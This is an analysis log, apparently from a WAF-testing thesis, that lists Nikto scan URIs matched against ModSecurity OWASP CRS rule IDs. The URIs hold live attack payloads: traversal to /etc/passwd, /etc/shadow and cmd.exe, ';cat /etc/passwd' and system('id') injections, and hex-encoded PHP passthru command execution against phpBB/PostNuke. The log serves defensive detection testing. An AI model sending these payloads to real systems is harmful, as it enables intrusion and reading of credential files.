# ms-inspectorlog v3.5
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/dit/Downloads/inspectorlog/ms-inspectorlog -l command_execution.uri -t list -r /home/dit/Downloads/inspectorlog/etc/basic_rules.conf -o /home/dit/TFG/inspectorlog/modsecurity/web_dinamica/owasp/opensource/nikto/command_execution.clean
Packet [7]	Uri [/web/RVwMAVrE.bat]	Nattacks [1 ]	Signatures	[920440]
Packet [11]	Uri [/web/RVwMAVrE.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [13]	Uri [/web/RVwMAVrE.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [17]	Uri [/web/RVwMAVrE.cmd]	Nattacks [1 ]	Signatures	[920440]
Packet [61]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [62]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [11 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[942460]
Packet [63]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [64]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [10 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[942460]
Packet [65]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [12 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930120]	[932160]	[942460]
Packet [66]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x56118416d7f0)%00]	Nattacks [13 ]	Signatures	[920270]	[920271]	[920272]	[930100]	[930110]	[930110]	[930110]	[930110]	[930110]	[930110]	[933161]	[942450]	[942460]
Packet [86]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [87]	Uri [/web/168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [94]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [95]	Uri [/web/101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [108]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [109]	Uri [/web/192.168.1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [136]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [137]	Uri [/web/1921681101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [150]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [151]	Uri [/web/backup.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [156]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [157]	Uri [/web/1921681.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [164]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [165]	Uri [/web/168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [166]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [167]	Uri [/web/192168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [168]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [169]	Uri [/web/1921681101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [172]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [173]	Uri [/web/site.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [174]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [175]	Uri [/web/101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [176]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [177]	Uri [/web/1921681.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [178]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [179]	Uri [/web/192.168.1.101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [190]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [191]	Uri [/web/192_168_1_101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [222]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [223]	Uri [/web/192168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [242]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [243]	Uri [/web/backup.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [280]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [281]	Uri [/web/192.168.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [310]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [311]	Uri [/web/1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [324]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [325]	Uri [/web/192.168.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [360]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [361]	Uri [/web/192.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [370]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [371]	Uri [/web/192.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [372]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [373]	Uri [/web/1.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [380]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [381]	Uri [/web/site.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [386]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [387]	Uri [/web/192.168.1.101.cer]	Nattacks [1 ]	Signatures	[920440]
Packet [388]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [389]	Uri [/web/192.168.1.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [402]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [403]	Uri [/web/192_168_1_101.sql]	Nattacks [1 ]	Signatures	[920440]
Packet [509]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [523]	Uri [/web/scripts/samples/details.idc]	Nattacks [1 ]	Signatures	[920440]
Packet [524]	Uri [/web/forumdisplay.php?GLOBALS\[\]=1&f=2&comma=\".system\('id'\)\.\"]	Nattacks [5 ]	Signatures	[942110]	[942370]	[942431]	[942460]	[942511]
Packet [529]	Uri [/web/scripts/Carello/Carello.dll]	Nattacks [1 ]	Signatures	[920440]
Packet [537]	Uri [/web/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [538]	Uri [/web/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c]	Nattacks [2 ]	Signatures	[930100]	[930110]
Packet [540]	Uri [/web/athenareg.php?pass=%20;cat%20/etc/passwd]	Nattacks [4 ]	Signatures	[930120]	[932100]	[932160]	[942110]
Packet [556]	Uri [/web/perl/-e%20%22system('cat%20/etc/passwd');\%22]	Nattacks [1 ]	Signatures	[933160]
Packet [656]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [657]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [658]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [659]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [660]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [661]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [662]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [663]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [664]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [665]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [666]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [667]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [668]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [669]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [670]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [671]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [672]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [673]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [674]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [675]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [676]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [677]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [678]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [679]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [680]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [681]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [682]	Uri [/web/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [683]	Uri [/web/postnuke/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [684]	Uri [/web/postnuke/html/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [685]	Uri [/web/modules/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [686]	Uri [/web/phpBB/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [687]	Uri [/web/forum/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [688]	Uri [/web/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [6 ]	Signatures	[920230]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [689]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [690]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [691]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [692]	Uri [/web/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [693]	Uri [/web/postnuke/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [694]	Uri [/web/postnuke/html/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [695]	Uri [/web/modules/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [696]	Uri [/web/phpBB/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [697]	Uri [/web/forum/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [698]	Uri [/web/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [699]	Uri [/web/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [700]	Uri [/web/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [701]	Uri [/web/modules/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [702]	Uri [/web/phpBB/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [703]	Uri [/web/forum/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [704]	Uri [/web/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [705]	Uri [/web/postnuke/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [706]	Uri [/web/postnuke/html/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [707]	Uri [/web/modules/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [708]	Uri [/web/phpBB/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [709]	Uri [/web/forum/index.php?Nikto=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [710]	Uri [/web/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [711]	Uri [/web/postnuke/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [712]	Uri [/web/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [713]	Uri [/web/modules/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [714]	Uri [/web/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [715]	Uri [/web/forum/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
Packet [716]	Uri [/web/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527]	Nattacks [7 ]	Signatures	[920230]	[932150]	[933130]	[933160]	[942110]	[942431]	[942460]
